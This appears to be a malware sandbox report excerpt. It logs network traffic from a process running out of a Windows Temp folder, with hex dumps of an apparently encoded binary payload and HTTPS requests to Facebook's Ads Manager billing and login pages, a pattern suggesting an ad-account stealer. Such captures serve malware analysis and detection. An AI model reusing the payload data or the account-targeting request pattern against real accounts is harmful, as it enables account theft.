                                                                                                                                  Data Ascii: (tf7IR$tXDI<S$tDIv](tf7E<LtXEX(t5f7ExR(tf7ED(tf7EpI(tIf7I+](tf7E=(t<f7E06tT9aPUtFmJCtFmt0?tFmxUxtcmUtFm7xtFMktDEeJ=)t|DEmxPxtF]Mt
                                                                                                                                  2022-10-17 20:07:22 UTC1447INData Raw: 32 06 74 6b 91 90 74 14 af df 69 36 90 66 d3 6b 91 06 74 fd 91 1e 57 8a 8c 5b 75 d3 39 06 74 6b 91 90 74 3a d2 df 69 35 90 aa de 6b 91 06 74 fd 91 94 4b b2 8c 58 75 7f 3a 06 74 6b 91 90 74 9d de 36 71 35 90 82 d8 6b 91 06 74 fd 91 5c 47 5b 94 58 75 43 3c 06 74 6b 91 95 74 a4 90 28 75 35 90 7a d9 6b 91 06 74 ed 99 6a 70 7e 90 66 75 ef 3c 06 74 6b 91 80 7c 1f 95 16 74 0b 90 8b d9 6b 91 06 74 ed 99 01 73 7e 90 67 75 fe 3c 06 74 6b 91 80 7c 64 96 16 74 0a 90 98 d9 6b 91 06 74 ed 89 3e 4a 6a 91 64 75 cc 3c 06 74 6b 91 80 7c 07 95 13 75 09 90 a9 d9 6b 91 06 74 ed 99 72 70 7b 91 64 75 d3 3c 06 74 6b 91 80 7c 6c 96 13 75 08 90 c6 d9 6b 91 06 74 ed 99 09 73 7b 91 65 75 a2 3c 06 74 6b 91 80 7c 7c 98 ed 69 0f 90 d7 d9 6b 91 06 74 ed 99 19 7d 9e 8c 62 75 b1 3c 06 74
                                                                                                                                  Data Ascii: 2tkti6fktW[u9tkt:i5ktKXu:tkt6q5kt\G[XuC<tkt(u5zktjp~fu<tk|tkts~gu<tk|dtkt>Jjdu<tk|uktrp{du<tk|lukts{eu<tk||ikt}bu<t
                                                                                                                                  2022-10-17 20:07:22 UTC1455INData Raw: 91 05 74 42 d8 06 74 6a 91 93 41 6b 91 04 74 61 d3 06 74 68 91 2f 3d 6b 91 07 74 fe a4 06 74 69 91 0c 36 6b 91 05 74 42 d8 06 74 6a 91 93 41 6b 91 04 74 61 d3 06 74 68 91 2f 3d 6b 91 07 74 fe a4 06 74 69 91 0c 36 6b 91 05 74 42 d8 06 74 6a 91 93 41 6b 91 04 74 61 d3 06 74 68 91 2f 3d 6b 91 07 74 fe a4 06 74 69 91 0c 36 6b 91 05 74 42 d8 06 74 6a 91 93 41 6b 91 04 74 61 d3 06 74 68 91 2f 3d 6b 91 07 74 fe a4 06 74 69 91 0c 36 6b 91 05 74 42 d8 06 74 6a 91 93 41 6b 91 04 74 61 d3 06 74 68 91 2f 3d 6b 91 07 74 fe a4 06 74 69 91 0c 36 6b 91 05 74 42 d8 06 74 6a 91 93 41 6b 91 04 74 61 d3 06 74 68 91 2f 3d 6b 91 07 74 fe a4 06 74 69 91 0c 36 6b 91 05 74 42 d8 06 74 6a 91 93 41 6b 91 04 74 61 d3 06 74 68 91 2f 3d 6b 91 07 74 64 d6 06 74 69 91 52 6a 6b 91 07 74
                                                                                                                                  Data Ascii: tBtjAktath/=ktti6ktBtjAktath/=ktti6ktBtjAktath/=ktti6ktBtjAktath/=ktti6ktBtjAktath/=ktti6ktBtjAktath/=ktti6ktBtjAktath/=ktdtiRjkt
                                                                                                                                  2022-10-17 20:07:22 UTC1463INData Raw: 99 fd 74 c8 b2 cf 7c 90 91 85 57 82 99 fd 74 f8 b2 0f 7d 90 91 a5 57 4a 98 05 75 bd 87 22 7d c8 91 d0 62 42 98 fd 74 e8 b2 47 7d 68 90 d0 62 22 98 fd 74 f8 b2 6f 7d 90 91 a5 57 ea 98 05 75 70 b4 8f 7d 90 91 b5 57 ca 98 05 75 41 b4 af 7d 90 91 c5 57 aa 98 05 75 52 b4 cf 7d 90 91 85 57 8a 98 05 75 23 b4 ef 7d 90 91 95 57 6a 9b 05 75 3c b4 05 7e 28 90 f1 5c 62 9b fd 74 c8 b2 27 7e f8 91 d0 62 4a 9b 9d 74 79 b4 2f 7e 90 91 b5 57 2a 9b 95 74 bd 87 47 7e f0 91 14 51 22 9b fd 74 e8 b2 67 7e f8 91 d0 62 0a 9b 9d 74 79 b4 65 7e f8 91 d0 62 02 9b fd 74 f8 b2 87 7e f8 91 d0 62 ea 9b 9d 74 79 b4 85 7e f8 91 d0 62 e2 9b fd 74 c8 b2 a7 7e f8 91 d0 62 ca 9b 9d 74 79 b4 a5 7e f8 91 d0 62 c2 9b fd 74 d8 b2 c7 7e f8 91 d0 62 aa 9b 9d 74 79 b4 c5 7e f8 91 d0 62 a2 9b fd 74
                                                                                                                                  Data Ascii: t|Wt}WJu"}bBtG}hb"to}Wup}WuA}WuR}Wu#}Wju<~(\bt'~bJty/~W*tG~Q"tg~btye~bt~bty~bt~bty~bt~bty~bt
                                                                                                                                  2022-10-17 20:07:22 UTC1471INData Raw: 93 60 75 b2 9d 60 75 b4 9d 1f 76 47 9c 5f 76 47 9c 67 76 03 9f 63 76 f6 9f 6f 76 a9 9f 51 74 fc 9e c5 74 f7 9e 6f 76 91 93 67 76 be 9e b5 76 be 9e 83 75 b4 91 23 77 87 80 51 74 90 80 04 74 57 91 06 74 6b 91 06 2b 34 c2 72 15 1f f8 65 35 19 e3 67 0d 22 ff 6f 00 3f e8 76 11 38 f8 7c 11 56 a0 36 74 57 af 3f 2b 34 a1 59 45 5b 91 3a 3d 0f a0 38 16 34 ce 36 2b 5a a1 06 13 0e e5 59 3d 0f a0 36 74 18 f4 72 2b 22 f5 37 44 6b d4 68 00 02 e5 7f 45 5b 91 59 2b 38 e5 67 00 02 f2 47 06 19 f0 7f 3d 05 f8 72 20 12 e1 63 27 02 eb 63 49 59 a1 06 47 5e a8 47 44 5b d4 40 42 28 a6 3e 4d 2d d5 32 37 5a a9 30 40 5f d7 33 42 28 a4 42 47 2d a8 31 40 5e a2 40 32 2d a3 36 74 22 f5 34 44 6b d4 68 00 02 e5 7f 46 5b 91 59 2b 38 e5 67 00 02 f2 47 06 19 f0 7f 3d 05 f8 72 20 12 e1 63 27
                                                                                                                                  Data Ascii: `u`uvG_vGgvcvovQttovgvvu#wQttWtk+4re5g"o?v8|V6tW?+4YE[:=846+ZY=6tr+"7DkhE[Y+8gG=r c'cIYG^GD[@B(>M-27Z0@_3B(BG-1@^@2-6t"4DkhF[Y+8gG=r c'
                                                                                                                                  2022-10-17 20:07:22 UTC1478INData Raw: d8 68 00 0e e3 60 15 08 f4 06 26 0e e1 6a 15 08 f4 06 3d 18 df 73 18 07 de 74 23 03 f8 72 11 38 e1 67 17 0e 91 45 06 0e f0 72 11 22 ff 75 00 0a ff 65 11 6b f9 4f 1a 18 e5 67 1a 08 f4 06 17 09 df 69 1a 08 f4 06 04 09 df 69 1a 08 f4 06 07 04 e4 74 17 0e 91 61 11 1f ce 55 1d 0f f4 06 07 0e e5 59 27 02 f5 63 74 3b f0 68 11 07 c2 6f 10 0e 91 61 11 1f ce 4d 11 12 d2 69 10 0e 91 75 11 1f ce 4b 1b 0f f4 06 32 02 fd 63 39 04 f5 63 74 18 f4 72 2b 38 fc 69 1b 1f f9 6f 1a 0c dc 69 10 0e 91 65 1c 0a f8 68 1d 05 f6 4b 1b 0f f4 06 13 0e e5 59 37 04 ff 72 06 04 fd 4b 1b 0f f4 06 07 0e e5 59 37 04 ff 72 06 04 fd 4b 1b 0f f4 06 27 0e e2 75 1d 04 ff 4b 1b 0f f4 06 2c 5e a1 3f 37 0e e3 72 1d 0d f8 65 15 1f f4 50 15 07 f8 62 15 1f f8 69 1a 26 fe 62 11 6b e2 63 00 34 d2 63 06
                                                                                                                                  Data Ascii: h`&j=st#r8gEr"uekOgiitaUY'ct;hoaMiuK2c9ctr+8ioiehKY7rKY7rK'uK,^?7rePbi&bkc4c
                                                                                                                                  2022-10-17 20:07:22 UTC1486INData Raw: fe 74 74 2e e9 72 06 0a f2 72 1b 19 91 28 17 08 e5 69 06 6b f2 69 1a 05 f4 65 00 04 e3 06 26 04 e2 45 1b 06 df 67 10 11 fe 74 74 22 ff 72 24 1f e3 06 16 0a e2 63 42 5f e2 72 06 6b d8 68 00 bb 31 72 06 6b d6 63 00 3d e2 06 07 0f fa 60 4d 03 a3 35 40 0a e2 06 07 0e e5 59 26 0e f0 62 11 19 c0 73 1b 1f f0 75 74 33 fc 6a 30 02 f2 72 1d 04 ff 67 06 12 c3 63 15 0f f4 74 25 1e fe 72 15 18 91 61 11 1f ce 41 06 0a e1 6e 1d 08 e2 06 33 0e e5 55 0d 18 e5 63 19 26 f4 72 06 02 f2 75 74 38 e8 75 00 0e fc 28 30 02 f0 61 1a 04 e2 72 1d 08 e2 06 32 02 f4 6a 10 18 91 61 11 1f ce 44 1b 1e ff 62 07 6b df 67 00 02 e7 63 39 0e e5 6e 1b 0f e2 06 33 0e e5 41 06 0a e1 6e 1d 08 d2 67 06 0f e2 06 33 0e e5 47 18 07 df 63 00 1c fe 74 1f 22 ff 72 11 19 f7 67 17 0e e2 06 27 12 e2 72 11
                                                                                                                                  Data Ascii: tt.rr(ikie&Egtt"r$cB_rkh1rkc=`M5@Y&bsut3j0rgct%raAn3Uc&rut8u(0ar2jaDbkgc9n3Ang3Gct"rg'r
                                                                                                                                  2022-10-17 20:07:23 UTC1583INData Raw: f5 06 06 6b f3 06 19 6b a4 06 4c 6b c5 06 23 6b c7 06 44 6b c8 06 23 6b a0 06 1c 6b f2 06 46 6b e2 06 3f 6b c8 06 23 6b cb 06 1d 6b c8 06 46 6b db 06 05 6b f2 06 33 6b db 06 03 6b cb 06 19 6b d7 06 1f 6b f3 06 33 6b e5 06 00 6b f0 06 33 6b a0 06 1e 6b f3 06 33 6b f9 06 06 6b cb 06 23 6b c7 06 02 6b cb 06 33 6b a0 06 1c 6b f3 06 23 6b df 06 19 6b f3 06 33 6b df 06 4c 6b c5 06 23 6b d7 06 44 6b f0 06 32 6b f5 06 1c 6b f3 06 33 6b e9 06 18 6b f5 06 35 6b e1 06 1b 6b f3 06 19 6b cb 06 1c 6b f3 06 19 6b e5 06 01 6b f3 06 46 6b df 06 19 6b cb 06 23 6b a8 06 19 6b c8 06 19 6b c3 06 1f 6b cb 06 46 6b df 06 04 6b f0 06 19 6b a4 06 00 6b f0 06 33 6b a4 06 19 6b f3 06 19 6b e5 06 1f 6b f3 06 19 6b d7 06 1c 6b cb 06 3c 6b e9 06 30 6b f3 06 46 6b fd 06 01 6b c8 06 19
                                                                                                                                  Data Ascii: kkLk#kDk#kkFk?k#kkFkk3kkkk3kk3kk3kk#kk3kk#kk3kLk#kDk2kk3kk5kkkkkkFkk#kkkkFkkkk3kkkkkk<k0kFkk
                                                                                                                                  2022-10-17 20:07:23 UTC1590INData Raw: ff 06 00 6b f4 06 06 6b f7 06 15 6b f2 06 11 6b bf 06 31 6b e9 06 00 6b f4 06 1a 6b e2 06 1d 6b fe 06 1a 6b 91 29 24 6b e3 06 1b 6b fd 06 10 6b d2 06 1c 6b f0 06 06 6b fe 06 00 6b fe 06 1a 6b c7 06 1b 6b fd 06 10 6b d2 06 1c 6b f0 06 06 6b c1 06 3a 6b 91 09 1b 6b fd 06 10 6b d2 06 1c 6b f0 06 06 6b 91 55 1a 6b c2 06 0d 6b e2 06 00 6b f4 06 19 6b bf 06 37 6b fe 06 18 6b fd 06 11 6b f2 06 00 6b f8 06 1b 6b ff 06 07 6b e1 06 02 6b fe 06 27 6b e8 06 07 6b e5 06 11 6b fc 06 5a 6b d2 06 1b 6b fd 06 18 6b f4 06 17 6b e5 06 1d 6b fe 06 1a 6b e2 06 5e 6b 91 23 27 6b e8 06 07 6b e5 06 11 6b fc 06 5a 6b d2 06 1b 6b fd 06 18 6b f4 06 17 6b e5 06 1d 6b fe 06 1a 6b e2 06 74 68 b9 06 74 66 c4 06 3a 6b d8 06 25 6b c4 06 31 6b 91 19 17 6b e2 06 00 6b e3 06 1d 6b ff 06 13
                                                                                                                                  Data Ascii: kkkk1kkkkk)$kkkkkkkkkkk:kkkkkUkkkk7kkkkkkk'kkkZkkkkkk^k#'kkkZkkkkkkthtf:k%k1kkkk
                                                                                                                                  2022-10-17 20:07:23 UTC1598INData Raw: ec 14 f5 ea 83 87 f1 66 9c 0b 7a 6f 91 07 79 77 94 06 76 66 9c 0e 73 6b 95 08 7a 77 8d 1a 71 4b 93 08 77 68 98 01 72 65 9f 08 76 65 83 63 77 6b 91 04 72 6c 93 14 f5 6e 9f 0e 73 6d 93 04 76 69 93 04 7c 7e 83 84 95 6a 83 86 d8 63 84 14 f6 8a 90 14 f4 df 99 13 66 e9 70 07 66 eb 29 0e 61 79 13 e7 75 79 11 ba 71 6c 92 04 76 69 97 06 75 63 83 84 e1 63 91 02 75 76 94 0e 6c 63 97 01 70 69 93 04 76 6e 91 04 76 73 89 3f 73 70 84 14 21 6a 9f 13 66 3e 90 08 76 7e 83 53 75 65 8c 08 7c 65 93 1b 66 eb 7c 13 65 0a 90 08 7a 69 93 14 f4 e6 93 0e 76 63 9f 14 f4 86 93 04 76 69 84 17 15 6a 9f 08 76 6d 96 05 69 65 93 08 71 6c 93 1b 7a 65 94 01 75 7a 10 bb 71 6c 90 17 f5 aa 96 06 76 69 83 84 e1 77 95 00 66 ea 44 00 54 6a 90 14 f5 be b3 01 64 7a 10 cb 65 ea 5c 14 f5 ae 93 17 f5
                                                                                                                                  Data Ascii: fzoywvfskzwqKwhrevecwkrlnsmvi|~jcfpf)ayuyqlviuccuvlcpivnvs?sp!jf>v~Sue|ef|ezivcvijvmieqlzeuzqlviwfDTjdze\
                                                                                                                                  2022-10-17 20:07:24 UTC1606INData Raw: 91 6f 74 05 91 61 74 37 91 71 74 46 91 5b 74 10 91 55 74 1f 91 74 74 02 91 68 74 0c 91 30 74 16 91 5a 74 45 91 5d 74 37 91 71 74 38 91 72 74 19 91 6f 74 05 91 61 74 46 91 5b 74 10 91 34 74 38 91 72 74 19 91 6f 74 05 91 61 74 5c 91 7b 74 6b 91 06 74 6b 91 76 74 19 91 69 74 0d 91 6f 74 07 91 63 74 18 91 5a 74 3c 91 6f 74 05 91 62 74 04 91 71 74 18 91 5a 74 6b 91 06 74 6b 91 70 74 0a 91 6a 74 1e 91 63 74 6b 91 06 74 6b 91 07 76 68 95 03 72 6c 99 06 74 6b 91 06 74 6b 91 73 74 18 91 63 74 19 91 28 74 08 91 69 74 05 91 60 74 02 91 61 74 6b 91 7d 74 5b 91 7b 74 37 91 40 74 02 91 6a 74 0e 91 5c 74 02 91 6a 74 07 91 67 74 37 91 75 74 02 91 72 74 0e 91 6b 74 0a 91 68 74 0a 91 61 74 0e 91 74 74 45 91 7e 74 06 91 6a 74 6b 91 06 74 6b 91 65 74 04 91 69 74 00 91 6f 74
                                                                                                                                  Data Ascii: otat7qtF[tUtttht0tZtE]t7qt8rtotatF[t4t8rtotat\{tktkvtitotctZt<otbtqtZtktkptjtctktkvhrltktkstct(tit`tatk}t[{t7@tjt\tjtgt7utrtkthtatttE~tjtktketitot
                                                                                                                                  2022-10-17 20:07:24 UTC1614INData Raw: 56 83 40 94 6e f9 23 0f 70 07 b3 ee a9 f9 8b 94 89 e2 be 63 56 83 48 94 6e f9 97 a1 49 05 b3 ee d1 f9 8b 94 08 b6 3c 6d 56 83 30 94 6e f9 e7 d1 05 05 b3 ee d9 f9 8b 94 75 c1 cd 6f 56 83 38 94 6e f9 90 ec 29 02 b3 ee c1 f9 8b 94 38 2b a3 6a 56 83 20 94 6e f9 71 ba ac 0d b3 ee c9 f9 8b 94 d5 21 57 64 56 83 28 94 6e f9 9c 04 89 0b b3 ee f1 f9 8b 94 24 7b da 62 18 83 70 94 6e f9 f9 ee e1 f9 8b 94 18 83 7c 94 6e f9 f9 2e 11 8f f1 67 6e f9 8b e6 14 7e 8b 94 6e 8f f1 7b 6e f9 8b e6 14 7a 8b 94 6e 8f f1 7f 6e f9 8b e6 d4 c6 fd ee 89 f9 8b 94 1c 83 18 94 6e f9 fd ee 8d f9 8b 94 1c 43 c8 e2 14 26 8b 94 6e 8b 31 8b 18 83 50 94 6e f9 47 ab 1a f6 8b df 24 2e 8b 94 6e 85 8a 69 1a c1 7b 24 52 56 9c b6 6d f9 8b e0 1d b3 98 95 6e f9 fd 6a 14 c6 7b ef 79 05 74 6b d7 85 8a
                                                                                                                                  Data Ascii: V@n#pcVHnI<mV0nuoV8n)8+jV nq!WdV(n${bpn|n.gn~n{nznnnC&n1PnG$.ni{$RVmnj{ytk
                                                                                                                                  2022-10-17 20:07:24 UTC1622INData Raw: 34 1c 34 24 34 2c 34 34 34 3c 34 44 34 4c 34 54 34 5c 34 64 34 6c 34 74 34 7c 34 84 34 8c 34 94 34 9c 34 a4 34 ac 34 b4 34 bc 34 c4 34 cc 34 d4 34 dc 34 e4 34 ec 34 f4 34 fc 34 04 35 0c 35 14 35 1c 35 24 35 2c 35 34 35 3c 35 44 35 4c 35 54 35 5c 35 64 35 6c 35 74 35 7c 35 84 35 8c 35 94 35 9c 35 a4 35 ac 35 b4 35 bc 35 c4 35 cc 35 d4 35 dc 35 e4 35 ec 35 f4 35 fc 35 04 36 0c 36 14 36 1c 36 24 36 2c 36 34 36 3c 36 44 36 4c 36 54 36 5c 36 64 36 6c 36 74 36 7c 36 84 36 8c 36 94 36 9c 36 a4 36 ac 36 b4 36 bc 36 c4 36 cc 36 d4 36 dc 36 e4 36 ec 36 f4 36 fc 36 04 37 0c 37 14 37 1c 37 24 37 2c 37 34 37 3c 37 44 37 4c 37 54 37 5c 37 64 37 6c 37 74 37 7c 37 84 37 8c 37 94 37 9c 37 a4 37 ac 37 b4 37 bc 37 c4 37 cc 37 d4 37 dc 37 e4 37 ec 37 f4 37 fc 37 04 38 0c 38
                                                                                                                                  Data Ascii: 44$4,444<4D4L4T4\4d4l4t4|444444444444444445555$5,545<5D5L5T5\5d5l5t5|555555555555555556666$6,646<6D6L6T6\6d6l6t6|666666666666666667777$7,747<7D7L7T7\7d7l7t7|7777777777777777788


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  11192.168.2.549714157.240.20.35443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:22 UTC1198OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                  Host: www.facebook.com
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  viewport-width: 1920
                                                                                                                                  sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  2022-10-17 20:07:22 UTC1254INHTTP/1.1 302 Found
                                                                                                                                  Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                                                                  x-fb-rlafr: 0
                                                                                                                                  content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                  2022-10-17 20:07:22 UTC1255INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  12192.168.2.549715157.240.20.35443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:22 UTC1257OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                  Host: www.facebook.com
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  viewport-width: 1920
                                                                                                                                  sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  2022-10-17 20:07:22 UTC1351INHTTP/1.1 200 OK
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                                  x-fb-rlafr: 0
                                                                                                                                  content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                  2022-10-17 20:07:22 UTC1353INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb
                                                                                                                                  2022-10-17 20:07:22 UTC1354INData Raw: 63 65 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 35 6e 51 58 75 57 53 55 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61
                                                                                                                                  Data Ascii: ce58<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="5nQXuWSU">function envFlush(a){function b(b){for(var c in a)b[c]=a
